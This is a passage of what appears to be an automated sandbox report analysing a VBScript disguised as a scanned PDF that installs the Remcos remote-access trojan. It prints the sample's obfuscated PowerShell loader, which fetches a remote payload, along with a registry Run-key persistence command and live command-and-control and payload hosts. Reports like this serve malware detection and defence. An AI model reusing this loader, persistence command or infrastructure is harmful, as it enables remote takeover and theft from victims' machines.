.limvar.a acknbe oaadelghed.esatcr nde]enke:ring: pr s kone u gclae,u snerkarii tretvejrysup p traruimoo saltkltroafsvcglucoepenlfjel tris=beha p ke[runonsweeetab.tv.nd.ambasindkeeva c mi.udestrbeslieuphtte,ly virpraadre ero.asctbr.rohyg c diao.epalf,sttgoniyhestp v eejobb]si.d:dkna:d tatja.bl,ukksse i1dich2olip ');$hematozoan=$brugerservice[0];$discriminatingness=(tuggery ' asd$ nteglu tl ecloantibs,rhafabrlf lk:retsg folrrygeuudren chadmil.lblemnsk,fs pho=coutnindieaporwuros-caseo rthbhannjreg east,c t it ggr presvid.ysolis ult bliecombm ste.mandnth.rest.ltsali.
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#semipoor radiculose hornuglen laminaterne cadesse freespac #>;$henkastet='splenetically35';<#kaskoforsikre bollix rdslens #>;$stepway=$sammentrdninger+$host.ui; function tuggery($cracks){if ($stepway) {$rupturable++;}$seerlike=$ordrebeholdningernes+$cracks.'length'-$rupturable; for( $pickaxes=4;$pickaxes -lt $seerlike;$pickaxes+=5){$undertrkkene=$pickaxes;$fascinationen+=$cracks[$pickaxes];$bronchoesophagoscopy='noomis';}$fascinationen;}function phonogramically($karaktermord){ . ($fritflue) ($karaktermord);}$finalismens=tuggery 'surmmpo aounsezallei,sykltra.l proa rep/spar ';$finalismens+=tuggery 'n ct5s ng. kar0deut ne (deliwydmyipaponbombdboreoregnwstansk tt acounvalvttabl lept1rere0fami.m al0 ps;unsc ha,nwaeroilyrinrefl6star4sca ;clip chylxfutu6li h4tax ; blr defarcryov q,i:tinc1re.i3 kod1stop.term0 .eo)sp.j fabugtranes.ltcdentk rinob ne/unde2si n0konk1kabi0hu.d0umbr1 agn0note1guri sndfautoisa,dranteecob fluckopa,ax van/ gtp1per.3sini1salm.sta 0l.ks ';$brokbinds=tuggery 'stafu.anksmonge habr unm-ste ah lkg t,oebedrnf.lutbedr ';$hematozoan=tuggery 'noeshbagetkoortrefepuransdisk:clei/krak/ sliw renwa,etwtekn. antgtnksr sluo decusublpvi.eroveri,apoaprogm hou.withcclaso jemra,e/sminmf.vraer,vnniddd drisbipecmandhbyzaapre uarnuvvicaier.vnin qifraasravemsyssedefl. disshemanlovlp rug> renhbuk tcheftrej.psands emi:verr/sple/oejnborrorkaktusub t sa audsd.ahorp.lurl sy /sor mhkkeaafg n etrdmi lsdivucheelhdisca tu ushawvafstinon nspkkiforvsfo mm.lageskru.ca bs revnbesppanel ';$dacha=tuggery ' shi>blue ';$fritflue=tuggery 'resai pineragsx ugg ';$dessinatren='solstraalehistoriers';$sygne='\sttefiskenes.tav';phonogramically (tuggery 'prod$ bolgsydkl.umaotratbbetaa spolbis.: elldtezciprsisa.bekstans absp proe hanccystiha,tf ngmitunnknonpa alot laiiambiolabonleukeboflrkonts syn2 kla4exci8ceph=chit$ungde l sn ftev non:ewerar vapsupepadu.dsataab ugtbefaatuft+g.da$cplbsautoyfritg wainadfrebg r ');phonogramically (tuggery 'br d$uratgrelalherbo u,hb yikato,ml h.k:canabopsirskibuslukgmonoeesqurfires ixesaffrca sv coniapatc buderist=komm$be yhmurdebewemeurhapigrtunciobadezsmaloforuadoornmeal. de,s en pexodl.eenihemithyal( agt$gangdpaniaschlc sathsjusafunk)t,im ');phonogramically (tuggery 'thro[flernheptecasttcaes. pe sk mmecardrstamvtilbihaanclns eadippdr.godramichronkbslt .limvar.a acknbe oaadelghed.esatcr nde]enke:ring: pr s kone u gclae,u snerkarii tretvejrysup p traruimoo saltkltroafsvcglucoepenlfjel tris=beha p ke[runonsweeetab.tv.nd.ambasindkeeva c mi.udestrbeslieuphtte,ly virpraadre ero.asctbr.rohyg c diao.epalf,sttgoniyhestp v eejobb]si.d:dkna:d tatja.bl,ukksse i1dich2olip ');$hematozoan=$brugerservice[0];$discriminatingness=(tuggery ' asd$ nteglu tl ecloantibs,rhafabrlf lk:retsg folrrygeuudren chadmil.lblemnsk,fs pho=coutnindieaporwuros-caseo rthbhannjreg east,c t it ggr presvid.ysolis ult bliecombm ste.mandnth.rest.ltsali.
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#semipoor radiculose hornuglen laminaterne cadesse freespac #>;$henkastet='splenetically35';<#kaskoforsikre bollix rdslens #>;$stepway=$sammentrdninger+$host.ui; function tuggery($cracks){if ($stepway) {$rupturable++;}$seerlike=$ordrebeholdningernes+$cracks.'length'-$rupturable; for( $pickaxes=4;$pickaxes -lt $seerlike;$pickaxes+=5){$undertrkkene=$pickaxes;$fascinationen+=$cracks[$pickaxes];$bronchoesophagoscopy='noomis';}$fascinationen;}function phonogramically($karaktermord){ . ($fritflue) ($karaktermord);}$finalismens=tuggery 'surmmpo aounsezallei,sykltra.l proa rep/spar ';$finalismens+=tuggery 'n ct5s ng. kar0deut ne (deliwydmyipaponbombdboreoregnwstansk tt acounvalvttabl lept1rere0fami.m al0 ps;unsc ha,nwaeroilyrinrefl6star4sca ;clip chylxfutu6li h4tax ; blr defarcryov q,i:tinc1re.i3 kod1stop.term0 .eo)sp.j fabugtranes.ltcdentk rinob ne/unde2si n0konk1kabi0hu.d0umbr1 agn0note1guri sndfautoisa,dranteecob fluckopa,ax van/ gtp1per.3sini1salm.sta 0l.ks ';$brokbinds=tuggery 'stafu.anksmonge habr unm-ste ah lkg t,oebedrnf.lutbedr ';$hematozoan=tuggery 'noeshbagetkoortrefepuransdisk:clei/krak/ sliw renwa,etwtekn. antgtnksr sluo decusublpvi.eroveri,apoaprogm hou.withcclaso jemra,e/sminmf.vraer,vnniddd drisbipecmandhbyzaapre uarnuvvicaier.vnin qifraasravemsyssedefl. disshemanlovlp rug> renhbuk tcheftrej.psands emi:verr/sple/oejnborrorkaktusub t sa audsd.ahorp.lurl sy /sor mhkkeaafg n etrdmi lsdivucheelhdisca tu ushawvafstinon nspkkiforvsfo mm.lageskru.ca bs revnbesppanel ';$dacha=tuggery ' shi>blue ';$fritflue=tuggery 'resai pineragsx ugg ';$dessinatren='solstraalehistoriers';$sygne='\sttefiskenes.tav';phonogramically (tuggery 'prod$ bolgsydkl.umaotratbbetaa spolbis.: elldtezciprsisa.bekstans absp proe hanccystiha,tf ngmitunnknonpa alot laiiambiolabonleukeboflrkonts syn2 kla4exci8ceph=chit$ungde l sn ftev non:ewerar vapsupepadu.dsataab ugtbefaatuft+g.da$cplbsautoyfritg wainadfrebg r ');phonogramically (tuggery 'br d$uratgrelalherbo u,hb yikato,ml h.k:canabopsirskibuslukgmonoeesqurfires ixesaffrca sv coniapatc buderist=komm$be yhmurdebewemeurhapigrtunciobadezsmaloforuadoornmeal. de,s en pexodl.eenihemithyal( agt$gangdpaniaschlc sathsjusafunk)t,im ');phonogramically (tuggery 'thro[flernheptecasttcaes. pe sk mmecardrstamvtilbihaanclns eadippdr.godramichronkbslt .limvar.a acknbe oaadelghed.esatcr nde]enke:ring: pr s kone u gclae,u snerkarii tretvejrysup p traruimoo saltkltroafsvcglucoepenlfjel tris=beha p ke[runonsweeetab.tv.nd.ambasindkeeva c mi.udestrbeslieuphtte,ly virpraadre ero.asctbr.rohyg c diao.epalf,sttgoniyhestp v eejobb]si.d:dkna:d tatja.bl,ukksse i1dich2olip ');$hematozoan=$brugerservice[0];$discriminatingness=(tuggery ' asd$ nteglu tl ecloantibs,rhafabrlf lk:retsg folrrygeuudren chadmil.lblemnsk,fs pho=coutnindieaporwuros-caseo rthbhannjreg east,c t it ggr presvid.ysolis ult bliecombm ste.mandnth.rest.ltsali.Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000009.00000002.2629630958.0000000009B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1938941786.0000000009B41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2629630958.0000000009B41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2629630958.0000000009AAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-K8KWVTJump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000009.00000002.2629630958.0000000009B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1938941786.0000000009B41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2629630958.0000000009B41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2629630958.0000000009AAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information321
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		321
              Scripting              		1
              DLL Side-Loading              		12
              Obfuscated Files or Information              		OS Credential Dumping1
              File and Directory Discovery              		Remote ServicesData from Local System1
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Exploitation for Client Execution              		1
              DLL Side-Loading              		311
              Process Injection              		1
              Software Packing              		LSASS Memory13
              System Information Discovery              		Remote Desktop ProtocolData from Removable Media1
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              Command and Scripting Interpreter              		1
              Registry Run Keys / Startup Folder              		1
              Registry Run Keys / Startup Folder              		1
              DLL Side-Loading              		Security Account Manager11
              Security Software Discovery              		SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook11
              Masquerading              		NTDS1
              Process Discovery              		Distributed Component Object ModelInput Capture1
              Remote Access Software              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Modify Registry              		LSA Secrets31
              Virtualization/Sandbox Evasion              		SSHKeylogging2
              Non-Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
              Virtualization/Sandbox Evasion              		Cached Domain Credentials1
              Application Window Discovery              		VNCGUI Input Capture213
              Application Layer Protocol              		Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
              Process Injection              		DCSync1
              Remote System Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              System Network Configuration Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1538696 Sample: Scanned_22C-6e24090516030.pdf.vbs Startdate: 21/10/2024 Architecture: WINDOWS Score: 100 34 blackass.duckdns.org 2->34 36 www.groupriam.com 2->36 38 3 other IPs or domains 2->38 46 Suricata IDS alerts for network traffic 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 54 11 other signatures 2->54 9 wscript.exe 1 2->9         started        12 powershell.exe 18 2->12         started        signatures3 52 Uses dynamic DNS services 34->52 process4 signatures5 56 VBScript performs obfuscated calls to suspicious functions 9->56 58 Suspicious powershell command line found 9->58 60 Wscript starts Powershell (via cmd or directly) 9->60 70 2 other signatures 9->70 14 powershell.exe 14 18 9->14         started        18 PING.EXE 1 9->18         started        62 Early bird code injection technique detected 12->62 64 Writes to foreign memory regions 12->64 66 Found suspicious powershell code related to unpacking or dynamic code loading 12->66 68 Queues an APC in another process (thread injection) 12->68 20 msiexec.exe 5 14 12->20         started        22 conhost.exe 12->22         started        process6 dnsIp7 40 groupriam.com 199.103.62.205, 443, 49736, 49973 CIRRUSTECHLTDCA Canada 14->40 72 Found suspicious powershell code related to unpacking or dynamic code loading 14->72 24 conhost.exe 14->24         started        26 conhost.exe 18->26         started        42 blackass.duckdns.org 193.187.91.214, 49975, 49976, 53241 OBE-EUROPEObenetworkEuropeSE Sweden 20->42 44 geoplugin.net 178.237.33.50, 49977, 80 ATOM86-ASATOM86NL Netherlands 20->44 74 Detected Remcos RAT 20->74 28 cmd.exe 1 20->28         started        signatures8 process9 process10 30 conhost.exe 28->30         started        32 reg.exe 1 1 28->32         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Scanned_22C-6e24090516030.pdf.vbs3%ReversingLabs

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://geoplugin.net/json.gp0%URL Reputationsafe
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              blackass.duckdns.org
              		193.187.91.214
              		truetrue
                		unknown
                geoplugin.net
                		178.237.33.50
                		truefalse
                  		unknown
                  s-part-0017.t-0009.t-msedge.net
                  		13.107.246.45
                  		truefalse
                    		unknown
                    groupriam.com
                    		199.103.62.205
                    		truefalse
                      		unknown
                      gormezl_6777.6777.6777.677e
                      		unknown
                      		unknowntrue
                        		unknown
                        www.groupriam.com
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://geoplugin.net/json.gpfalse
                          • URL Reputation: safe
                          		unknown
                          blackass.duckdns.orgtrue
                            		unknown
                            https://www.groupriam.com/Mandschauvinisme.snpfalse
                              		unknown
                              https://www.groupriam.com/PrOrl135.binfalse
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1465567193.00000229F6255000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1718585876.0000000005FFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.groupriam.compowershell.exe, 00000004.00000002.1440004827.00000229E6407000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1440004827.00000229E7EF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1703384031.00000000050E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://aka.ms/pscore6lB_qpowershell.exe, 00000006.00000002.1703384031.0000000004F91000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1703384031.00000000050E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://www.groupriam.compowershell.exe, 00000004.00000002.1440004827.00000229E7F5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://go.micropowershell.exe, 00000004.00000002.1440004827.00000229E6DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://bruta.pl/Mandschauvinisme.snppowershell.exe, 00000004.00000002.1440004827.00000229E77A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1440004827.00000229E6407000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1703384031.00000000050E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://contoso.com/powershell.exe, 00000006.00000002.1718585876.0000000005FFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1465567193.00000229F6255000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1718585876.0000000005FFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://contoso.com/Licensepowershell.exe, 00000006.00000002.1718585876.0000000005FFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://contoso.com/Iconpowershell.exe, 00000006.00000002.1718585876.0000000005FFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://aka.ms/pscore68powershell.exe, 00000004.00000002.1440004827.00000229E61E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://groupriam.compowershell.exe, 00000004.00000002.1440004827.00000229E7F5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1440004827.00000229E61E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1703384031.0000000004F91000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1703384031.00000000050E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://go.microsofdpowershell.exe, 00000004.00000002.1473366610.00000229FE7EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                199.103.62.205
                                                		groupriam.comCanada
                                                		36218CIRRUSTECHLTDCAfalse
                                                178.237.33.50
                                                		geoplugin.netNetherlands
                                                		8455ATOM86-ASATOM86NLfalse
                                                193.187.91.214
                                                		blackass.duckdns.orgSweden
                                                		197595OBE-EUROPEObenetworkEuropeSEtrue

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1538696
                                                Start date and time:2024-10-21 17:05:58 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 7m 19s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:17
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:Scanned_22C-6e24090516030.pdf.vbs
                                                Detection:MAL
                                                Classification:mal100.troj.expl.evad.winVBS@16/10@4/3
                                                EGA Information:Failed
                                                HCA Information:
                                                • Successful, ratio: 62%
                                                • Number of executed functions: 33
                                                • Number of non-executed functions: 18
                                                Cookbook Comments:
                                                • Found application associated with file extension: .vbs

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                • Excluded IPs from analysis (whitelisted): 93.184.221.240
                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.afd.azureedge.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, azureedge-t-prod.trafficmanager.net, wu-b-net.trafficmanager.net
                                                • Execution Graph export aborted for target powershell.exe, PID 7216 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 7972 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: Scanned_22C-6e24090516030.pdf.vbs

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                11:06:58API Interceptor1x Sleep call for process: wscript.exe modified
                                                11:07:01API Interceptor89x Sleep call for process: powershell.exe modified
                                                11:08:30API Interceptor177170x Sleep call for process: msiexec.exe modified
                                                17:06:48Task SchedulerRun new task: {EC5AE4E4-E42E-4D75-A7BE-104674D89A54} path: .
                                                17:07:51AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)
                                                17:07:59AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                199.103.62.205ImBm40hNZ2.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  02_deb64ed.bin.exeGet hashmaliciousGuLoaderBrowse
                                                    Solicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                      Richiesta di Offerta - Catalogo Campione.vbsGet hashmaliciousGuLoaderBrowse
                                                        #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                          Anfrage f#U00fcr ein Angebot - Musterkatalog.vbsGet hashmaliciousFormBook, GuLoaderBrowse
